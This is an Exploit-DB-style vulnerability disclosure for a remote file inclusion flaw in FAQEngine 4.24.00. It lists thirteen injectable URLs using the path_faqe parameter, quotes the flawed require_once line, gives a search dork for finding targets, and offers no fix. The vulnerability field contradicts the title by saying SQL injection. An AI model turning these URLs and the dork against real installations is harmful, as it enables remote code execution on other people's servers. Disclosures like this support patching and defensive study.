ad

FAQEngine 4.24.00 - Remote File Inclusion vulnerability



EDB-ID: 11111 CVE: 2010-1360 OSVDB-ID: 63820
Author: kaMtiEz Published: 2010-01-11 Verified: Not Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
###################################################################################
                                                                                  #
[~] FAQEngine 4.24.00 - Remote File Inclusion vulnerability   [ RFI ]             #
[~] Author	: kaMtiEz (kamzcrew@gmail.com)                                    #
[~] Homepage	: http://www.indonesiancoder.com                                  #
[~] Date	: January 6, 2010                                                 #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -            
[+] Location : INDONESIA - JOGJA

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]

etc etc etc .. too much ..

[ ERROR IN ]

require_once($path_faqe."/includes/global.inc.php");

[ FIX ] 

dunno .. :P~~

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] KEEP MOVIN .. !
[+] INDONESIANCODER still r0x

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM